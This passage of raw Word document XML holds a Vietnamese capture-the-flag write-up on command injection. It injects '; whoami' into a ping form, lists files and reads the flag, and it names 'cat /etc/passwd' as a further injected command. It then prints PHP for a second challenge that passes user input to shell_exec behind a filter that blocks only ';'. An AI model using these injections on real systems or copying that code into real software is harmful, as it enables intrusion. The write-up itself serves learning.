        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D2859" w14:textId="46AE39B1" w:rsidR="000A1BFF" w:rsidRPr="000A1BFF" w:rsidRDefault="00DD52A1" w:rsidP="00DD52A1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD52A1">
        <w:t xml:space="preserve">hiến hàm shell_exec() thực hiện những cmd ngoài ý muốn của </w:t>
      </w:r>
      <w:r>
        <w:t>hệ thống bằng cách t</w:t>
      </w:r>
      <w:r w:rsidR="000A1BFF">
        <w:t xml:space="preserve">rực tiếp đưa vào các </w:t>
      </w:r>
      <w:r w:rsidR="000A1BFF" w:rsidRPr="000A1BFF">
        <w:t xml:space="preserve">đầu vào có chứa ký tự đặc biệt như ;, &amp;&amp;, hoặc </w:t>
      </w:r>
      <w:r w:rsidR="000A1BFF">
        <w:t xml:space="preserve">| để kết thúc câu lệnh hiện tại và sau đó chèn thêm các câu lệnh hệ thống khác như whoami, cat /etc/passwd </w:t>
      </w:r>
      <w:r w:rsidR="00374264">
        <w:t>để thực thi RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D35D2" w14:textId="3B497B54" w:rsidR="005E69D3" w:rsidRPr="00184ED1" w:rsidRDefault="005E69D3" w:rsidP="005E69D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F793129" w14:textId="77777777" w:rsidR="00CF4644" w:rsidRDefault="00CF4644" w:rsidP="00CF4644"/>
    <w:p w14:paraId="754C4596" w14:textId="77777777" w:rsidR="00DD52A1" w:rsidRDefault="00DD52A1" w:rsidP="00CF4644"/>
    <w:p w14:paraId="06808ADF" w14:textId="4682D124" w:rsidR="005C6D63" w:rsidRDefault="00B4774B" w:rsidP="00B4774B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B4774B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sau khi truy cập vào trang web, ứng dụng </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web hiển thị </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4774B">
        <w:t>chức năng ping nhằm kiểm tra khả năng kết nối tới địa chỉ đầu vào.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E3F55" w:rsidRPr="002E3F55">
        <w:t xml:space="preserve">Dựa trên phân tích trước đó về cách xử lý đầu vào, </w:t>
      </w:r>
      <w:r w:rsidR="002E3F55">
        <w:t>mình</w:t>
      </w:r>
      <w:r w:rsidR="002E3F55" w:rsidRPr="002E3F55">
        <w:t xml:space="preserve"> thử chèn chuỗi ; whoami vào tham số đầu vào nhằm kiểm tra khả năng thực thi lệnh hệ thống thông qua lỗ hổng Command Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B17130E" w14:textId="77B7C755" w:rsidR="00436A87" w:rsidRDefault="00436A87">
      <w:r w:rsidRPr="00436A87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6066F965" wp14:editId="47E006EE">
            <wp:extent cx="5731510" cy="1767205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1313743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43336" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1767205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F64F14" w14:textId="004F2A58" w:rsidR="006D414F" w:rsidRDefault="006D414F" w:rsidP="006D414F">
      <w:r>
        <w:t>Kết quả của v</w:t>
      </w:r>
      <w:r w:rsidRPr="006D414F">
        <w:t>iệc chèn chuỗi ; whoami vào tham số đầu vào đã dẫn đến việc thực thi lệnh hệ thống, cụ thể là whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F985B9" w14:textId="19785AA2" w:rsidR="006D414F" w:rsidRPr="006D414F" w:rsidRDefault="006D414F" w:rsidP="006D414F">
      <w:r>
        <w:t>Tiếp đó sử dụng lệnh ls để tìm file flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE54E2D" w14:textId="091C3DF1" w:rsidR="00436A87" w:rsidRDefault="00436A87">
      <w:r w:rsidRPr="00436A87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B80EE57" wp14:editId="1F8F0AD6">
            <wp:extent cx="5731510" cy="1616075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="559795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95192" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1616075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F0E25D" w14:textId="6D60F40F" w:rsidR="00436A87" w:rsidRDefault="006D414F">
      <w:r>
        <w:t>Thực hiện đọc flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BC3FE7" w14:textId="632D3072" w:rsidR="00436A87" w:rsidRDefault="00436A87">
      <w:r w:rsidRPr="00436A87">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57A8635F" wp14:editId="3129D821">
            <wp:extent cx="5731510" cy="1661795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2051154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54446" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1661795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C6E35" w14:textId="77777777" w:rsidR="00436A87" w:rsidRDefault="00436A87"/>
    <w:p w14:paraId="3B3A963E" w14:textId="77777777" w:rsidR="00B5377B" w:rsidRDefault="00B5377B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="680323A3" w14:textId="309035FB" w:rsidR="00B5377B" w:rsidRPr="00FF23DE" w:rsidRDefault="00B5377B" w:rsidP="006C2EE6">
      <w:pPr>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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B0625" w14:textId="77777777" w:rsidR="00B5377B" w:rsidRPr="00FF23DE" w:rsidRDefault="00B5377B" w:rsidP="00B5377B">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15"/>
      </w:tblGrid>
      <w:tr w:rsidR="00580DA3" w:rsidRPr="00580DA3" w14:paraId="69D9DAAA" w14:textId="77777777" w:rsidTr="00580DA3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3156EE52" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00580DA3">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F017C07" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27001A3F" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49FBA68C" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56312386" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="362C9D47" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689A7F36" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0F3355" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0430E8E6" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="636368B0" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B41D6C" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53D9B13E" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61717ED9" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1C372D" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077DAC37" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B447EE9" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC5B50C" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BF3F55" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EDA600" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23062D3C" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F022B77" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514A57CF" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>(isset($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>],$_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>])){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C178966" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">        $command = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'command'</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DFEE8CC" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">        $target = $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'target'</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57358C4F" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> (strpos($target, </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>";"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">) !== </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C54A75D" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Hacker detected!"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A56D82" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>switch</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>($command) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6366DC15" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"ping"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C15F2E2" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 ping -c 4 </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7113BF76" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA4F958" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"nslookup"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFE78F6" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 nslookup </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297366F6" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B41ACEE" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>case</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"dig"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3193FDD4" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
              <w:t>$result = shell_exec(</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">"timeout 10 dig </w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>$target</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2&gt;&amp;1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157D7FEA" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>break</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA0FBF1" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CEE0E69" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00580DA3">
              <w:t>($result);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33ABC563" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC02860" w14:textId="77777777" w:rsidR="00580DA3" w:rsidRPr="00580DA3" w:rsidRDefault="00580DA3" w:rsidP="00580DA3">
            <w:r w:rsidRPr="00580DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19106503" w14:textId="77777777" w:rsidR="00436A87" w:rsidRDefault="00436A87"/>
    <w:p w14:paraId="197365B7" w14:textId="3110D960" w:rsidR="008566A5" w:rsidRDefault="008566A5" w:rsidP="008566A5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
